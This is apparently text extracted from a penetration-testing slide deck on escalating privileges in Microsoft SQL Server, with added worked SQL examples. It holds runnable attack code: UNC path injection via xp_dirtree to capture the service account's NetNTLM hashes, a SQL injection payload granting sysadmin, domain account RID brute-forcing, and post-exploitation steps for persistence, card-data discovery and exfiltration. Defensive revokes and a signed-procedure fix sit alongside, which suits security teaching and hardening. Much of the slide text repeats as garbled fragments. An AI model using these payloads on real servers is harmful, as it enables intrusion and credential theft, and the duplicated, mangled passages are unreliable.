HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Figure: "Leveraging MS SQL Database links", built up over four frames on the same network diagram (Internet, DMZ, intranet with LRA, HVA, LVAs and ADS). Attack path: (1) Captain Evil performs SQL injection against an LVA in the DMZ (DB1) over ports 80 and 443; DB1 holds one database link configured with least privileges and another configured with the SA account; (2) execute SQL queries and local commands on database servers via nested linked servers over ports 1433 and 1434. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of the environments we've seen.

Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker-controlled host
• An attacker can then capture the NetNTLM challenge/response (commonly called the "password hash") and crack it offline or relay it; relaying works only against targets that do not require SMB signing
• Relay becomes pretty easy when you know which SQL Servers are using shared service accounts
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree
xp_fileexist

So in summary...
The PUBLIC role can obtain the SQL Server service account's NetNTLM challenge/response by default.

But who really has PUBLIC role access?
Oh yeah, a ton of domain users.

Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive.
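The block below is an added example for the UNC path injection slides; it is not code from the deck or from PowerUpSQL. It shows the forced authentication from an unprivileged login, the permission query behind the "by default" claim, and the revoke that closes it. 10.0.0.5 is an assumed attacker host running an SMB capture or relay listener, and lowpriv is an assumed non-sysadmin SQL login.

```sql
-- Added example, not from the original slides or PowerUpSQL.
-- 1. Attacker side: any login in public. The service account authenticates to the
--    host with NTLM before SQL Server finds out whether the share exists.
EXEC master.sys.xp_dirtree   '\\10.0.0.5\share', 1, 1;
EXEC master.sys.xp_fileexist '\\10.0.0.5\share\probe.txt';

-- 2. Defender side: who holds EXECUTE on the two file-path procedures?
--    A stock instance lists 'public' as grantee for both.
SELECT o.name AS procedure_name, pr.name AS grantee, p.state_desc, p.permission_name
FROM master.sys.database_permissions AS p
JOIN master.sys.all_objects         AS o  ON o.object_id = p.major_id
JOIN master.sys.database_principals AS pr ON pr.principal_id = p.grantee_principal_id
WHERE p.class = 1                                   -- object-level permissions
  AND o.name IN ('xp_dirtree', 'xp_fileexist')
ORDER BY o.name, pr.name;

-- 3. Hardening: pull the default grant. Sysadmins bypass the check, so the SSMS
--    file-browse dialogs (which call xp_dirtree) keep working for administrators.
USE master;
REVOKE EXECUTE ON OBJECT::sys.xp_dirtree   FROM public;
REVOKE EXECUTE ON OBJECT::sys.xp_fileexist FROM public;

-- 4. Re-test as a low-privileged login; the call should now land in the CATCH block.
EXECUTE AS LOGIN = 'lowpriv';
BEGIN TRY
    EXEC master.sys.xp_dirtree '\\10.0.0.5\share', 1, 1;
    SELECT 'still executable: revoke did not take effect' AS result;
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS error_number, ERROR_MESSAGE() AS error_message;
END CATCH;
REVERT;
```

The revoke only removes the two procedures that public gets for free. Other path-accepting features (BACKUP, BULK INSERT, xp_cmdshell) already require higher privilege, which is why the slide's point is about the public role specifically; the relay side is addressed on the network by requiring SMB signing and by not sharing the service account across servers.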
Escalating Privileges: OS Admin to SysAdmin

Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Approach by SQL Server version (2000, 2005, 2008, 2012, 2014, 2016):
• LSA Secrets: 2000, 2005, 2008, 2012, 2014, 2016
• Local Administrator (BUILTIN\Administrators is sysadmin by default): 2000, 2005
• LocalSystem (NT AUTHORITY\SYSTEM is sysadmin by default): 2000, 2005, 2008
• Process Migration: 2000, 2005, 2008, 2012, 2014, 2016
• Token Stealing: 2000, 2005, 2008, 2012, 2014, 2016
• Single User Mode: five of the six versions (the extracted table does not show which one is excluded)

Below are some options for leveraging that knowledge.

Here are some tool options:
Approach / Common Tools
• Access as Local Administrator: Management Studio, sqlcmd and other native SQL client tools
• Access as LocalSystem: PsExec, accessibility options (debugger) with native SQL client tools
• Recover the SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or a DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal the authentication token from the SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
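Before choosing one of the approaches above it is worth confirming which defaults actually apply on the instance at hand. The queries below are an added check, not from the deck or PowerUpSQL; they need a session that can read the server catalog (sys.dm_server_services additionally needs VIEW SERVER STATE and exists from SQL Server 2008 R2 SP1 on).

```sql
-- Added example, not from the original slides or PowerUpSQL.
SELECT @@VERSION AS version;

-- Every member of sysadmin. On the versions in the table this is where
-- BUILTIN\Administrators (2000/2005) and NT AUTHORITY\SYSTEM (through 2008 R2)
-- show up, together with the per-service SID of the service account and
-- anything an administrator added later.
SELECT p.name AS sysadmin_member, p.type_desc, p.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY p.type_desc, p.name;

-- The Windows account each service runs as. A domain account here is the one
-- whose LSA secret, token or process is worth taking, and the one that may be
-- shared with other instances.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;
```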
Common Post Exploitation Activities

Post Exploitation Overview
1. Establish Persistence
   • SQL Server layer: startup procedures, Agent jobs, triggers, modified code
   • OS layer: registry and file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted (TDE) databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
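The following is an added example covering items 1 and 2 of the overview; it is not code from the deck or from PowerUpSQL. It lists the SQL-layer persistence points, finds TDE databases, searches column names across user databases, and then validates samples with a Luhn check rather than trusting column names. The function name and the sample rows are constructed for the example.

```sql
-- Added example, not from the original slides or PowerUpSQL. Run as sysadmin.
-- 1. Persistence at the SQL Server layer: startup procedures, Agent jobs, server triggers.
SELECT name AS startup_procedure
FROM master.sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

SELECT name, enabled, date_created, date_modified FROM msdb.dbo.sysjobs;
SELECT name, is_disabled, create_date, modify_date FROM sys.server_triggers;

-- 2a. TDE databases. The encryption is at rest only; a sysadmin session reads them normally.
SELECT name FROM sys.databases WHERE is_encrypted = 1;

-- 2b. Columns whose names suggest secrets, across every online user database.
DECLARE @sql nvarchar(max) = N'';
SELECT @sql += N'SELECT ' + QUOTENAME(name, '''') + N' AS db, s.name AS [schema], t.name AS [table], c.name AS [column]
FROM ' + QUOTENAME(name) + N'.sys.columns c
JOIN ' + QUOTENAME(name) + N'.sys.tables  t ON t.object_id = c.object_id
JOIN ' + QUOTENAME(name) + N'.sys.schemas s ON s.schema_id = t.schema_id
WHERE c.name LIKE ''%pass%'' OR c.name LIKE ''%ssn%'' OR c.name LIKE ''%card%'' OR c.name LIKE ''%secret%'';' + CHAR(10)
FROM sys.databases
WHERE database_id > 4 AND state_desc = 'ONLINE';
EXEC sp_executesql @sql;
GO

-- 2c. Luhn checksum for sampled values: from the right, double every second digit,
--     subtract 9 from doubled values above 9, and require a total divisible by 10.
CREATE FUNCTION dbo.fn_luhn_valid (@digits varchar(32))
RETURNS bit
AS
BEGIN
    IF @digits IS NULL OR @digits LIKE '%[^0-9]%' OR LEN(@digits) < 12
        RETURN 0;
    DECLARE @i int = LEN(@digits), @sum int = 0, @double bit = 0, @d int;
    WHILE @i > 0
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @i, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END
        SET @sum = @sum + @d;
        SET @double = 1 - @double;
        SET @i = @i - 1;
    END
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END
GO

-- Constructed sample values (not real card numbers): one valid Luhn, one off by one,
-- one non-numeric. T-SQL has no regex; LIKE with a repeated digit class stands in.
DECLARE @sample TABLE (note varchar(64));
INSERT INTO @sample VALUES ('4111111111111111'), ('4111111111111112'), ('order 12345');
SELECT note, dbo.fn_luhn_valid(note) AS luhn_valid
FROM @sample
WHERE note LIKE REPLICATE('[0-9]', 16);
```

In a real engagement the last query is pointed at TOP-N samples of the columns found in step 2b; the Luhn filter removes most order numbers and IDs that merely happen to be 16 digits long.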
Escalating Privileges: Weak Passwords

Enumerating SQL logins with only public access:
2. Get the principal ID for the sa account with "SUSER_ID"
3. Use "SUSER_NAME" to get SQL logins using just the principal ID
4. Increment the number and repeat

select n [id], SUSER_NAME(n) [user_name]
from (
  select top 10000 row_number() over(order by t1.number) as N
  from master..spt_values t1 cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null

Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7

Enumerating domain accounts:
3. Grab the first 48 hex characters (24 bytes) of the full SID; the remaining 4 bytes are the RID in little-endian byte order
   Full SID   = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
   Domain SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
   (the trailing 0x00020000 is RID 512, the Domain Admins group)
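The SID-splitting step above, generalized into a RID brute force, as an added example that is not code from the deck or from PowerUpSQL. SUSER_SID returns the SID of any Windows principal the server can resolve, and SUSER_SNAME resolves a SID through the OS whether or not it maps to a SQL login, so domain accounts with no presence on the instance are enumerated too. CORP is an assumed domain name; Domain Admins is only the seed used to learn the domain SID.

```sql
-- Added example, not from the original slides or PowerUpSQL.
DECLARE @group_sid varbinary(85) = SUSER_SID('CORP\Domain Admins');   -- assumed domain
IF @group_sid IS NULL
BEGIN
    RAISERROR('Seed principal not resolvable; use any domain group or user the server knows.', 16, 1);
    RETURN;
END

-- Split the seed: bytes 1-24 are the domain SID, bytes 25-28 the RID (little-endian).
DECLARE @domain_sid varbinary(24) = SUBSTRING(@group_sid, 1, 24);
DECLARE @seed_rid int =
      CAST(SUBSTRING(@group_sid, 25, 1) AS int)
    + CAST(SUBSTRING(@group_sid, 26, 1) AS int) * 256
    + CAST(SUBSTRING(@group_sid, 27, 1) AS int) * 65536
    + CAST(SUBSTRING(@group_sid, 28, 1) AS int) * 16777216;
SELECT @domain_sid AS domain_sid, @seed_rid AS seed_rid;   -- Domain Admins carries RID 512

-- Walk a RID range, rebuilding each SID with the RID in little-endian order.
-- Well-known RIDs start at 500; ordinary users and groups usually start at 1000.
DECLARE @found TABLE (rid int PRIMARY KEY, account nvarchar(256));
DECLARE @rid int = 500, @sid varbinary(28), @name nvarchar(256);
WHILE @rid <= 1500
BEGIN
    SET @sid = @domain_sid
        + CAST( @rid             % 256 AS binary(1))
        + CAST((@rid / 256)      % 256 AS binary(1))
        + CAST((@rid / 65536)    % 256 AS binary(1))
        + CAST((@rid / 16777216) % 256 AS binary(1));
    SET @name = SUSER_SNAME(@sid);
    IF @name IS NOT NULL
        INSERT INTO @found VALUES (@rid, @name);
    SET @rid += 1;
END
SELECT rid, account FROM @found ORDER BY rid;
```

Each SUSER_SNAME call is an LSA lookup against a domain controller, so widen the range in steps rather than scanning tens of thousands of RIDs in one batch. The resulting account list feeds the same dictionary attack the slide describes for SQL logins.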
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues

• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• The db_owner role can impersonate the actual database owner

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE

Cons
• No granular control over the database owner's privileges
• db_owner role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution (and for any other server-level action, such as the sp_addsrvrolemember call below)
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions

Example: a member of db_owner creates a procedure that runs as the database owner.

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER.

Use signed procedures instead:
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certificate
o GRANT EXECUTE to user

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution

Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
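The seven signed-procedure steps above, worked end to end, as an added example that is not code from the deck or from PowerUpSQL. The database MyAppDb, the user MyAppUser and its login MyAppLogin, the procedure, certificate and login names, and the master key password are assumptions for the example. The procedure needs VIEW SERVER STATE (sys.dm_exec_sessions shows other users' sessions only with that right), which the caller never receives directly.

```sql
-- Added example, not from the original slides or PowerUpSQL. SQL Server 2012+ syntax.
USE MyAppDb;
GO
-- 1. The procedure that needs a server-level right the caller does not have.
CREATE PROCEDURE dbo.usp_list_sessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END
GO
-- 2. Database master key: protects the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'ExampleOnly-ChangeMe-9f!';
GO
-- 3. Certificate used only for signing this procedure.
CREATE CERTIFICATE SessionProcSigningCert
    WITH SUBJECT = 'Signs dbo.usp_list_sessions';
GO
-- 4 + 5. Copy the public half into master, create a login from it, and grant that
--        login exactly the right the procedure needs (no sysadmin, no TRUSTWORTHY).
DECLARE @pub nvarchar(max) =
    CONVERT(nvarchar(max), CERTENCODED(CERT_ID('SessionProcSigningCert')), 1);
DECLARE @sql nvarchar(max) = N'
    USE master;
    CREATE CERTIFICATE SessionProcSigningCert FROM BINARY = ' + @pub + N';
    CREATE LOGIN SessionProcSigningLogin FROM CERTIFICATE SessionProcSigningCert;
    GRANT VIEW SERVER STATE TO SessionProcSigningLogin;';
EXEC sp_executesql @sql;
GO
-- 6. Sign the procedure. SQL Server drops the signature when the procedure text is
--    altered, so an injected ALTER PROCEDURE loses the extra right instead of keeping it.
ADD SIGNATURE TO dbo.usp_list_sessions BY CERTIFICATE SessionProcSigningCert;
GO
-- 7. Let the application user run it.
GRANT EXECUTE ON dbo.usp_list_sessions TO MyAppUser;
GO
-- Verification as the application login: the procedure returns all user sessions,
-- while the login itself still holds no VIEW SERVER STATE outside the procedure.
EXECUTE AS LOGIN = 'MyAppLogin';   -- assumed login mapped to MyAppUser
EXEC dbo.usp_list_sessions;
SELECT HAS_PERMS_BY_NAME(NULL, NULL, 'VIEW SERVER STATE') AS has_direct_grant;
REVERT;
```

Compared with the EXECUTE AS OWNER version, the privilege is attached to the code rather than to whoever owns the database, and the grant can be as narrow as the procedure's actual need. The two remaining cons on the slide still apply: injection inside the signed procedure runs with the signature's rights.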
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO

@DbName is concatenated straight into dynamic SQL. When a procedure like this is created WITH EXECUTE AS OWNER, whatever is injected through @DbName runs as the database owner.
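The same procedure with the impersonation clause from the previous slides, the call that abuses it, and a parameterized rewrite, as an added example that is not code from the deck or from PowerUpSQL. Assumptions: MyAppDb is owned by a sysadmin login, is TRUSTWORTHY (the slides' precondition for server-level actions under EXECUTE AS OWNER), and MyAppUser only has EXECUTE on the procedure.

```sql
-- Added example, not from the original slides or PowerUpSQL.
USE MyAppDb;
GO
-- Vulnerable: the slide's procedure with EXECUTE AS OWNER, kept as-is on purpose.
CREATE PROCEDURE dbo.sp_sqli2
    @DbName varchar(max)
WITH EXECUTE AS OWNER
AS
BEGIN
    DECLARE @query varchar(max);
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb''';
    EXECUTE(@query);
END
GO
GRANT EXECUTE ON dbo.sp_sqli2 TO MyAppUser;
GO

-- Attacker (as MyAppUser): close the LIKE literal, append a statement, comment out the rest.
-- The dynamic SQL becomes:
--   SELECT name FROM master..sysdatabases WHERE name like '%x';
--   EXEC sp_addsrvrolemember 'MyAppUser','sysadmin';--%' OR name='tempdb'
-- and runs as the sysadmin owner because of EXECUTE AS OWNER plus TRUSTWORTHY.
EXEC dbo.sp_sqli2 'x''; EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
SELECT IS_SRVROLEMEMBER('sysadmin', 'MyAppUser') AS myappuser_is_sysadmin;

-- Fixed: the parameter never becomes part of the SQL text. (A static query would do
-- here; sp_executesql is shown for the cases where dynamic SQL is genuinely needed.)
CREATE PROCEDURE dbo.usp_find_database
    @DbName sysname
WITH EXECUTE AS OWNER
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases WHERE name LIKE ''%'' + @pattern + ''%'' OR name = N''tempdb'';';
    EXEC sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO
-- The same payload now only searches for a database whose name contains the payload text.
EXEC dbo.usp_find_database 'x''; EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
```

Parameterization removes the injection; dropping EXECUTE AS OWNER in favour of a signed procedure, or leaving TRUSTWORTHY off, limits what any remaining bug can reach. Both changes are worth making, since the slides' point is that the owner context turns an ordinary injection into sysadmin.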
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
